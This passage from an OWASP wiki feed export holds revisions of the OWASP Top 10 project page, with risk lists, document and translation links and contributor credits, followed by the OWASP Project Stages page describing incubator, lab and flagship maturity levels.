* A9 Using Components with Known Vulnerabilities (new but was part of 2010-A6 – Security Misconfiguration)&lt;br /&gt;
* A10 Unvalidated Redirects and Forwards&lt;br /&gt;
&lt;br /&gt;
== Other 2013 Top 10 Docs ==&lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP Top 10 - 2013 - Release Candidate]&lt;br /&gt;
*[https://www.owasp.org/images/3/3d/OWASP_Top_10_-_2013_Final_Release_-_Change_Log.docx OWASP Top 10 - 2013 - Final Release - Change Log (docx)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Changes-from-2010.pptx Focusing on What Changed Since 2010 (PPTX)]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP_Web_Top_10_for_2013.png]]&lt;br /&gt;
&lt;br /&gt;
== Feedback ==&lt;br /&gt;
&lt;br /&gt;
Please let us know how your organization is using the OWASP Top 10. Include your name, organization's name, and brief description of how you use the list. Thanks for supporting OWASP! &lt;br /&gt;
&lt;br /&gt;
We hope you find the information in the OWASP Top 10 useful. Please contribute back to the project by sending your comments, questions, and suggestions to topten@lists.owasp.org. Thanks! &lt;br /&gt;
&lt;br /&gt;
To join the OWASP Top 10 mailing list or view the archives, please visit the [http://lists.owasp.org/mailman/listinfo/owasp-topten subscription page.] &lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ==== Project Identification ====&lt;br /&gt;
{{Template:OWASP OWASP_Top10 Project}} --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2010 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On April 19, 2010 the final version of the OWASP Top 10 for 2010 was released, and here is the associated [[OWASPTop10-2010-PressRelease|press release]]. This version was updated based on numerous comments received during the comment period after the release candidate was released in Nov. 2009. &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 - 2010 Document] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 - 2010 - wiki]] &lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2010%20Presentation.pptx OWASP Top 10 - 2010 Presentation]&lt;br /&gt;
*[http://blip.tv/owasp-appsec-conference-in-europe/day2_track1_1430-1505-3936900 OWASP Top 10 Video of the Presentation above - this focused alot on the Top 10 for 2010 approach, rather than the details. (From OWASP AppSec EU 2010)]&lt;br /&gt;
*[http://www.vimeo.com/9006276 OWASP Top 10 Video of this Presentation when the Top 10 for 2010 was 1st released for comment - this goes through each item in the Top 10. (From OWASP AppSec DC 2009)]&lt;br /&gt;
&lt;br /&gt;
For 2010, the OWASP Top 10 Most Critical Web Application Security Risks are: &lt;br /&gt;
&lt;br /&gt;
*[[Top_10_2010-A1|A1: Injection]]&lt;br /&gt;
*[[Top_10_2010-A2|A2: Cross-Site Scripting (XSS)]]&lt;br /&gt;
*[[Top_10_2010-A3|A3: Broken Authentication and Session Management]]&lt;br /&gt;
*[[Top_10_2010-A4|A4: Insecure Direct Object References]]&lt;br /&gt;
*[[Top_10_2010-A5|A5: Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
*[[Top_10_2010-A6|A6: Security Misconfiguration]]&lt;br /&gt;
*[[Top_10_2010-A7|A7: Insecure Cryptographic Storage]]&lt;br /&gt;
*[[Top_10_2010-A8|A8: Failure to Restrict URL Access]]&lt;br /&gt;
*[[Top_10_2010-A9|A9: Insufficient Transport Layer Protection]]&lt;br /&gt;
*[[Top_10_2010-A10|A10: Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages and the 2010 version was translated into even more languages. See below for all the translated versions.&lt;br /&gt;
&lt;br /&gt;
== 2010 Versions ==&lt;br /&gt;
&lt;br /&gt;
2010 Edition: &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 2010 - PDF] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 2010 - wiki]]&lt;br /&gt;
&lt;br /&gt;
2010 Translations: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF / 这里下载PDF格式文档]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] &lt;br /&gt;
*[[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]]&lt;br /&gt;
*[https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF]&lt;br /&gt;
*[https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF]&lt;br /&gt;
*[https://www.owasp.org/images/8/86/OWASP_Top_10_-_2010_FINAL_%28spanish%29.pptx OWASP Top 10 2010 - Spanish PPT]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF]&lt;br /&gt;
&lt;br /&gt;
2010 Release Candidate: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf OWASP Top 10 2010 Release Candidate] &lt;br /&gt;
*[https://www.owasp.org/images/e/e1/OWASP_Top_10_RC-Public_Comments.docx OWASP Top 10 2010 Release Candidate Comments], except for one set of scanned comments [https://www.owasp.org/images/2/2e/OWASP_T10_-_2010_rc1_cmts_Kai_Jendrian.pdf which are here].&lt;br /&gt;
&lt;br /&gt;
Previous versions: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf OWASP Top 10 2007 - PDF] &lt;br /&gt;
*[[Top 10 2007|OWASP Top 10 2007 - wiki]] &lt;br /&gt;
*[https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=Project_Details OWASP Top 10 2007 - PDF Translations are here] &lt;br /&gt;
*[[Top 10 2004|OWASP Top 10 2004 - wiki]]&lt;br /&gt;
&lt;br /&gt;
= Translation Efforts =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The 2017 RC1 has been rejected. There will be an RC2 coming out shortly. As RC2 may have significant changes from RC1, we suggest that you wait for RC2 before continuing your translation efforts. &lt;br /&gt;
&lt;br /&gt;
If you are interested in helping, please contact the members of the team for the language you are interested in contributing to, or if you don't see your language listed, please email owasp-topten@lists.owasp.org to let us know that you want to help and we'll form a volunteer group for your language.&lt;br /&gt;
&lt;br /&gt;
Here is the original source document for the [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pptx OWASP Top 10 - 2017 '''Release Candidate''' which is in PowerPoint].  &lt;br /&gt;
&lt;br /&gt;
2017 Release Candidate Translation Teams:&lt;br /&gt;
&lt;br /&gt;
* French: Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org. &lt;br /&gt;
* Chinese: 王颉、包悦忠、Rip、顾凌志、王厚奎、王文君、吴楠、夏天泽、夏玉明、杨天识、袁明坤、张镇(排名不分先后，按姓氏拼音排列)  [https://www.owasp.org/images/8/8f/OWASP_Top_10_2017（RC1）中文版（V1.0）.pdf OWASP Top10 2017 RC1 - Chinese PDF]&lt;br /&gt;
* Azerbaijanian: Rashad Aliyev (rashad@aliev.info)&lt;br /&gt;
* Others to be listed.&lt;br /&gt;
&lt;br /&gt;
2013 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
* Arabic: [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic PDF]  Translated by: Mohannad Shahat: Mohannad.Shahat@owasp.org, Fahad: @SecurityArk, Abdulellah Alsaheel: cs.saheel@gmail.com, Khalifa Alshamsi: Khs1618@gmail.com and Sabri(KING SABRI): king.sabri@gmail.com, Mohammed Aldossary: mohammed.aldossary@owasp.org&lt;br /&gt;
* Chinese 2013：中文版2013 [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)]. 项目组长： Rip 王颉， 参与人员： 陈亮、 顾庆林、 胡晓斌、 李建蒙、 王文君、 杨天识、 张在峰&lt;br /&gt;
* Czech 2013: [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)] [https://www.owasp.org/images/0/02/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pptx OWASP Top 10 2013 - Czech (PPTX)] CSIRT.CZ - CZ.NIC, z.s.p.o. (.cz domain registry): Petr Zavodsky: petr.zavodsky@owasp.org, Vaclav Klimes, Zuzana Duracinska, Michal Prokop, Edvard Rejthar, Pavel Basta&lt;br /&gt;
*French 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French PDF] Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org, Erwan Abgrall: g4l4drim@gmail.com, Benjamin Avet: benjamin.avet@gmail.com, Jocelyn Aubert: jocelyn.aubert@owasp.org, Damien Azambour: damien.azambourg@owasp.org, Aline Barthelemy: aline.barthelemy@fr.abb.com, Moulay Abdsamad Belghiti: abdsamad.belghiti@gmail.com, Gregory Blanc: gregory.blanc@gmail.com, Clément Capel: clement.capel@sfr.com, Etienne Capgras: Etienne.capgras@solucom.fr, Julien Cayssol: julien@aqwz.com, Antonio Fontes: antonio.fontes@owasp.org, Ely de Travieso: Ely.detravieso@owasp.org, Nicolas Grégoire: nicolas.gregoire@agarri.fr, Valérie Lasserre: valerie.lasserre@gmx.fr, Antoine Laureau: antoine.laureau@owasp.org, Guillaume Lopes: lopes.guillaume@free.fr, Gilles Morain: gilles.morain@gmail.com, Christophe Pekar: christophe.pekar@owasp.org, Olivier Perret: perrets@free.fr, Michel Prunet: michel.prunet@owasp.org, Olivier Revollat: revollat@gmail.com, Aymeric Tabourin: aymeric.tabourin@orange.com&lt;br /&gt;
* German 2013: [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Torsten Gigler, Tobias Glemser, Dr. Ingo Hanke, Thomas Herzog, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
* Hebrew 2013: [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf PDF] Translated by: Or Katz, Eyal Estrin, Oran Yitzhak, Dan Peled, Shay Sivan.&lt;br /&gt;
* Italian 2013: [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian PDF] Translated by: Michele Saporito: m.saporito7@gmail.com, Paolo Perego: thesp0nge@owasp.org, Matteo Meucci: matteo.meucci@owasp.org, Sara Gallo: sara.gallo@gmail.com, Alessandro Guido: alex@securityaddicted.com, Mirko Guido Spezie: mirko@dayu.it, Giuseppe Di Cesare: giuseppe.dicesare@alice.it, Paco Schiaffella: schiaffella@gmail.com, Gianluca Grasso: giandou@gmail.com, Alessio D'Ospina: alessiodos@gmail.com, Loredana Mancini: loredana.mancini@business-e.it, Alessio Petracca: alessio.petracca@gmail.com, Giuseppe Trotta: giutrotta@gmail.com, Simone Onofri: simone.onofri@gmail.com, Francesco Cossu: hambucker@gmail.com, Marco Lancini: marco.lancini.ml@gmail.com, Stefano Zanero: zanero@elet.polimi.it, Giovanni Schmid: giovanni.schmid@na.icar.cnr.it, Igor Falcomata': koba@sikurezza.org&lt;br /&gt;
*Japanese 2013: [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese PDF] Translated by: Chia-Lung Hsieh: ryusuke.tw(at)gmail.com, Reviewed by: Hiroshi Tokumaru, Takanori Nakanowatari&lt;br /&gt;
* Korean 2013: [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korean PDF] (이름가나다순) 김병효:byounghyo.kim@owasp.org, 김지원:jiwon.kim@owasp.or.kr, 김효근:katuri@katuri.kr, 박정훈:xelion@gmail.com, 성영모:youngmo.seong@owasp.or.kr, 성윤기:yune.sung@owasp.org, 송보영:boyoung.song@owasp.or.kr, 송창기:factor7@naver.com, 유정호:griphis77@gmail.com, 장상민:sangmin.jang@owasp.or.kr, 전영재:youngjae.jeon@owasp.org, 정가람:tgcarrot@gmail.com, 정홍순:jhs728@gmail.com, 조민재:johnny.cho@owasp.org,허성무:issimplenet@gmail.com&lt;br /&gt;
*Brazilian Portuguese 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese PDF] Translated by: Carlos Serrão, Marcio Machry, Ícaro Evangelista de Torres, Carlo Marcelo Revoredo da Silva, Luiz Vieira, Suely Ramalho de Mello, Jorge Olímpia, Daniel Quintão, Mauro Risonho de Paula Assumpção, Marcelo Lopes, Caio Dias, Rodrigo Gularte&lt;br /&gt;
*Spanish 2013: [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish PDF] Gerardo Canedo: gerardo.canedo@owasp.org, Jorge Correa: jacorream@gmail.com, Fabien Spychiger: fabien.spychiger@dreamlab.net, Alberto Hill: alberto.daniel.hill@gmail.com, Johnatan Stanley: johnatanst@gmail.com, Maximiliano Alonzo: malonzo@tib.com.uy, Mateo Martinez: mateo.martinez@owasp.org, David Montero: david.montero@owasp.org, Rodrigo Martinez: rodmart@fing.edu.uy, Guillermo Skrilec: guillermo.skrilec@owasp.org, Felipe Zipitria: felipe.zipitria@owasp.org, Fabien Spychiger: fabien.spychiger@dreamlab.net, Rafael Gil: rafael.gillarios@owasp.org, Christian Lopez: christian.lopez.martin@owasp.org, jonathan fernandez jonathan.fernandez04@gmail.com, Paola Rodriguez: Paola_R1@verifone.com, Hector Aguirre: hector.antonio.aguirre@owasp.org, Roger Carhuatocto: rcarhuatocto@intix.info, Juan Carlos Calderon: johnccr@yahoo.com, Marc Rivero López: mriverolopez@gmail.com, Carlos Allendes: carlos.allendes@owasp.org, daniel@carrero.cl: daniel@carrero.cl, Manuel Ramírez: manuel.ramirez.s@gmail.com, Marco Miranda: marco.miranda@owasp.org, Mauricio D. Papaleo Mayada: mpapaleo@gmail.com, Felipe Sanchez: felipe.sanchez@peritajesinformaticos.cl, Juan Manuel Bahamonde: juanmanuel.bahamonde@gmail.com, Adrià Massanet: adriamassanet@gmail.com, Jorge Correa: jacorream@gmail.com, Ramiro Pulgar: ramiro.pulgar@owasp.org, German Alonso Suárez Guerrero: german.suarez@owasp.org, Jose A. Guasch: jaguasch@gmail.com, Edgar Salazar: edgar.salazar@owasp.org&lt;br /&gt;
*Ukrainian 2013: [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian PDF] Kateryna Ovechenko, Yuriy Fedko, Gleb Paharenko, Yevgeniya Maskayeva, Sergiy Shabashkevich, Bohdan Serednytsky&lt;br /&gt;
&lt;br /&gt;
2010 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
*Korean 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF] Hyungkeun Park, (mirrk1@gmail.com)&lt;br /&gt;
*Spanish 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF] *Daniel Cabezas Molina , Edgar Sanchez, Juan Carlos Calderon, Jose Antonio Guasch, Paulo Coronado, Rodrigo Marcos, Vicente Aguilera&lt;br /&gt;
*French 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] ludovic.petit@owasp.org, sebastien.gioria@owasp.org, antonio.fontes@owasp.org, benoit.guerette@owasp.org, Jocelyn.aubert@owasp.org, Eric.Garreau@gemalto.com, Guillaume.Huysmans@gemalto.com &lt;br /&gt;
*German: [[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Tobias Glemser, Dr. Ingo Hanke, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
*Indonesian: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF] Tedi Heriyanto (coordinator), Lathifah Arief, Tri A Sundara, Zaki Akhmad&lt;br /&gt;
*Italian: [https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF] Simone Onofri, Paolo Perego, Massimo Biagiotti, Edoardo Viscosi, Salvatore Fiorillo, Roberto Battistoni, Loredana Mancini, Michele Nesta, Paco Schiaffella, Lucilla Mancini, Gerardo Di Giacomo, Valentino Squilloni&lt;br /&gt;
*Japanese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF] cecil.su@owasp.org, Dr. Masayuki Hisada, Yoshimasa Kawamoto, Ryusuke Sakamoto, Keisuke Seki, Shin Umemoto, Takashi Arima&lt;br /&gt;
*Chinese: [https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF] 感谢以下为中文版本做出贡献的翻译人员和审核人员: Rip Torn, 钟卫林, 高雯, 王颉, 于振东&lt;br /&gt;
*Vietnamese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF] Translation lead by Cecil Su - Translation Team: Dang Hoang Vu, Nguyen Ba Tien, Nguyen Tang Hung, Luong Dieu Phuong, Huynh Thien Tam&lt;br /&gt;
*Hebrew: [[OWASP_Top10_Hebrew|OWASP Top 10 Hebrew Project]] -- [https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]. Lead by Or Katz, see translation page for list of contributors.&lt;br /&gt;
&lt;br /&gt;
= Project Details =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Top10 | OWASP Project Identification Tab}}&lt;br /&gt;
&lt;br /&gt;
= Some Commercial &amp;amp; OWASP Uses of the Top 10 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Warning''': these articles have not been rated for accuracy by OWASP. Product companies should be extremely careful about claiming to &amp;quot;cover&amp;quot; or &amp;quot;ensure compliance&amp;quot; with the OWASP Top 10. The current state-of-the-art for automated detection (scanners and static analysis) and prevention (WAF) is nowhere near sufficient to claim adequate coverage of the issues in the Top 10. Nevertheless, using the Top 10 as a simple way to communicate security to end users is effective. &lt;br /&gt;
&lt;br /&gt;
;[https://blogs.microsoft.com/microsoftsecure/2008/05/01/sdl-and-the-owasp-top-ten/ Microsoft] &lt;br /&gt;
:as a way to measure the coverage of their SDL and improve security&lt;br /&gt;
&lt;br /&gt;
;[https://www.pcisecuritystandards.org/index.shtml PCI Council] &lt;br /&gt;
:as part of the Payment Card Industry Data Security Standard (PCI DSS)&lt;br /&gt;
&lt;br /&gt;
;[http://msdn.microsoft.com/en-us/library/dd129898.aspx Microsoft] &lt;br /&gt;
:to show how &amp;quot;T10 threats are handled by the security design and test procedures of Microsoft&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_10/Mapping_to_WHID | OWASP]]&lt;br /&gt;
:OWASP Top 10 Mapped to the Web Hacking Incident Database&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Mobile_Security_Project#tab=Top_Ten_Mobile_Risks | OWASP]]&lt;br /&gt;
:OWASP Mobile Top 10 Risks&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_Ten_Cheat_Sheet | OWASP]]&lt;br /&gt;
:OWASP Top 10 Cheat Sheet&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]][[Category:Popular]][[Category:SAMM-EG-1]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Autodesk-logo.png&amp;diff=235460</id>
		<title>File:Autodesk-logo.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Autodesk-logo.png&amp;diff=235460"/>
				<updated>2017-11-14T22:06:34Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Autodesk logo 250x41&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Project_Stages&amp;diff=235269</id>
		<title>OWASP Project Stages</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Project_Stages&amp;diff=235269"/>
				<updated>2017-11-10T17:15:43Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: deleted stray &amp;quot;headertabs&amp;quot; tag&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Overview =&lt;br /&gt;
==OWASP Project Stages==&lt;br /&gt;
Projects, along with Global Conferences and Local Chapters, are the cornerstone of the OWASP organization. We want to provide a fostering environment for new ideas and energetic project leaders; however, our global consumers depend on OWASP to provide dependable, quality projects. Our OWASP Project Stages represent a balance between keeping a very loose structure around OWASP projects, and ensuring that OWASP consumers are not confused about a project’s maturity and quality.&lt;br /&gt;
&lt;br /&gt;
Our lifecycle stages allow consumers to easily identify mature projects, and projects that are proofs of concept, experimental, and classified as prototypes in their current state. The greater the maturity of the project, the greater the level of responsibility for the project leader. These responsibilities are not trivial as OWASP provides incentives and benefits for projects who take on these added responsibilities.&lt;br /&gt;
&lt;br /&gt;
The OWASP Project Lifecycle is broken down into the following stages:&lt;br /&gt;
&lt;br /&gt;
::::::*'''OWASP Incubator Projects'''&lt;br /&gt;
&lt;br /&gt;
::::::*'''OWASP Labs Projects'''&lt;br /&gt;
&lt;br /&gt;
::::::*'''OWASP Flagship Projects'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Each of these stages is described in greater detail in the sections that follow. At a minimum, all OWASP projects have a project name, a project leader, a project description, a project license choice, and a project roadmap. The goal of an OWASP Project is to create a concrete deliverable that furthers the OWASP mission. Projects are divided into 3 main categories: Tool, Code Library, and Documentation. On this page, you will find more detailed information about what you can expect from a project at each of the OWASP Project stages. &lt;br /&gt;
&lt;br /&gt;
= Incubator Projects =&lt;br /&gt;
&lt;br /&gt;
== Incubator Projects == &lt;br /&gt;
[[Image:New projects.png | 150px | left]]&lt;br /&gt;
&lt;br /&gt;
OWASP Incubator projects represent the experimental playground where projects are still being designed, ideas are still being proven, and development is still underway. The “OWASP Incubator” label allows OWASP consumers to readily identify a project’s maturity. The label allows project leaders to leverage the OWASP name while their project is still maturing. OWASP Incubator projects are given a place on the OWASP Projects Portal to leverage the organization's infrastructure, and establish their presence and project history. Many of the benefits and privileges afforded to projects are dependent upon metrics and statistics that are tracked by the OWASP Projects Infrastructure.&lt;br /&gt;
&lt;br /&gt;
===Incubator Project Deliverables===&lt;br /&gt;
Leaders of Incubator Projects are expected to produce a draft or development release as a downloadable file on the project page within twelve (12) months of project inception. As previously mentioned, OWASP believes in pursuing ideas in a fail-fast manner. In order to avoid an excess of stagnant projects that never mature, projects will not be permitted to linger in an undeveloped state beyond this time period. If a project has not produced at least a draft or development release, the project will be removed from the OWASP Projects Portal. If a project leader subsequently produces a completed release and wishes to re-associate with OWASP Projects, then that project can be returned to the OWASP Projects Portal.&lt;br /&gt;
&lt;br /&gt;
Once a project leader has completed at least one version of a concrete deliverable, the project is eligible for graduation into the OWASP Labs. Note that graduation to the OWASP Labs is optional, and a project leader that has completed at least one concrete deliverable may continue in the OWASP Incubator stage.&lt;br /&gt;
&lt;br /&gt;
= Lab Projects = &lt;br /&gt;
== Lab Projects ==&lt;br /&gt;
[[Image:Midlevel projects.png | 150px | left]]&lt;br /&gt;
&lt;br /&gt;
OWASP Lab projects represent projects that have produced a deliverable of significant value. Leaders of OWASP Lab projects are expected to stand behind the quality of their projects as these projects have matured to the point where they are accepted by a significant portion of the OWASP community. While these projects are typically not production ready, the OWASP community expects that an OWASP Lab project leader is producing deliverables that are ready for mainstream usage.&lt;br /&gt;
&lt;br /&gt;
OWASP Lab projects are meant to be the collection of established projects that have gained community support and acclaim by undergoing the project review process. These reviews are part of the Incubator Graduation Process that is required to enter the OWASP Lab stage. To enter OWASP Lab, projects must be actively maintained, they must meet the OWASP Lab project standards, and they must seek to provide value to OWASP consumers.&lt;br /&gt;
&lt;br /&gt;
In recognition of these qualities, OWASP Lab projects have a primary spotlight in the OWASP Projects Portal, and they receive increased promotional opportunities within the OWASP organization.&lt;br /&gt;
While projects that graduate to the OWASP Lab can remain there indefinitely, project activity is a prominently featured piece of metadata on the Projects Portal. As a result, projects without periodic activity will be automatically tagged as inactive. As a result, project leaders are encouraged to maintain the level of excellence attributed to Lab projects.&lt;br /&gt;
&lt;br /&gt;
=Flagship Projects =&lt;br /&gt;
==Flagship Projects==&lt;br /&gt;
[[Image:Mature projects.png | 150px | left]]&lt;br /&gt;
&lt;br /&gt;
The goal of OWASP Flagship projects is to identify, highlight, and support mainstream OWASP projects that make up a complete application security product of high quality and value to the software security industry. These projects are selected for their strategic value to OWASP and application security as a whole.&lt;br /&gt;
&lt;br /&gt;
OWASP Flagship projects represent projects that are not only mature, but are also projects that OWASP as an organization provides direct support to maintaining. The core mission of OWASP is to make application security visible and so as an organization, OWASP has a vested interest in the success of its Flagship projects. Since Flagship projects have such high visibility, these projects are expected to uphold the most stringent requirements of all OWASP Projects.&lt;br /&gt;
&lt;br /&gt;
Selection for OWASP Flagship designation is by invitation only. A Labs project leader can present their case for why they think their project deserves Flagship status. However, there is no deterministic process to be designated a Flagship project. There are no steps to be followed that guarantee Flagship status. This status is reserved for the strategic use of OWASP to identify a platform that supports the OWASP mission to improve the state of application security via OWASP's open source projects.&lt;br /&gt;
&lt;br /&gt;
